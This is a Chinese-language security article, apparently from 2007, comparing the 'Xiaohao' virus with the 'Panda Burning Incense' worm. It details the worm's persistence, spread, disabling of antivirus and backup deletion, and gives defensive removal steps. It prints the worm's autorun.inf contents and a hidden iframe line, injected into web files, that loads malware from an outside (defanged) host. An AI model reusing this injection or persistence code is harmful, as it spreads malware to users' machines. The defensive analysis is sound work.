对比“熊猫烧香”
    与“小浩”病毒相比，“熊猫烧香”的危害狂潮在短短的两个月里，就将数百万台电脑感染在代码中，那只憨态可掬、颔首敬香的“熊猫”图片除而不尽，令人望而生畏。此时仍不得而知“小浩”病毒是否会出新变种，在感染危害上能否能超过猫风时期，而两者之间又有着什么样的联系呢？下面看下“熊猫烧香”的病毒行为特征：

    首先病毒会复制自身到系统目录%System%\drivers\下，生成病毒文件，（生成不同的目录变种文件如其下的：spoclsv.exe、System32\Drivers下的spoclsv.exe等）；随会后在注册表　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]中创建启动项如："svcshare"="%System%\drivers\spoclsv.exe"，并且生成硬盘各分区根目录文件setup.exe和autorun.inf文件，autorun.inf内容为：
    [AutoRun]
    OPEN=setup.exe
    shellexecute=setup.exe
    shell\Auto\command=setup.exe
    使其病毒文件在各盘自动加载运行，并且使用net share命令关闭管理共享，然后再次通过修改注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]键值下的"CheckedValue"=dword:00000000隐藏文件属性，病毒运行后会搜索并尝试关闭计算机中安装的各种安全软件，并尝试结束相关进程，禁用安全软件相关服务并删除相关启动项。如遇局域网环境，病毒会尝试使用弱密码，将副本命名为GameSetup.exe文件，进行复制传播。

    最后“熊猫烧香”病毒也会搜索硬盘中扩展名为：htm、html、asp、aspx、jsp、php等网页文件，并文件尾部追加语句<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>，指定网页，下载自身等各式木马病毒。随后病毒会查找系统中的GHO文件，将其强行删除，以防用户使用镜像恢复系统。

    以上两种病毒发作及感染形态读者一看便明，近期流行的“小浩”病毒在自动搜索网址插入代码，感染文件后的隐匿属性及更改个性图标，都显出了继“熊猫烧香”之后的新型病毒正在漫延。这里敬告用户在网络中畅游时，一定要小心为上！

    病毒预防及杀法
    对于“熊猫烧香”的清除方法这里不在重述了，请参见网址：http://publish.it168.com/2007/0517/20070517002201.shtml、http://publish.it168.com/2007/0130/20070130040601.shtml及http://publish.it168.com/2007/0131/20070131002301.shtml即可。

    关于“小浩”病毒的杀法江民科技提出：所有江民杀软用户只要将病毒库更新到8月14日，并利用Windows Update 功能为系统平台打上最新补丁，即可实现对病毒的拦截禁止入侵，总体解决步骤为：首先设定杀毒软件的升级时间、定时杀毒并开启软件中的所有监控功能（包含网页监控，防止病毒从网页中以木马的形式侵入），随后禁用自动播放功能（方法为：在开始菜单的运行项中输入gpedit.msc，打开组策略-本地计算机策略-计算机配置-管理模板，在系统下选择设置勾选启用关闭自动播放，并在其关闭自动播放框中选择所有驱动器，确定退出即可），这样即可防止病毒从第三方存诸设备中利用自动播放功能带入。

    后记：据消息称，目前一些病毒编写者还会将病毒源代码公开在互联网中，并留下联系方式，以期技术上的交流指正。其实熊猫烧香、AV终结者、小浩病毒的相继产生，虽然将互联网安全的天空蒙上了一层阴影，但同时也标志着新一代的防毒体系即将到来，其间的关系是相辅相成的，病毒在发展的同时也推进了反病毒技术的进步。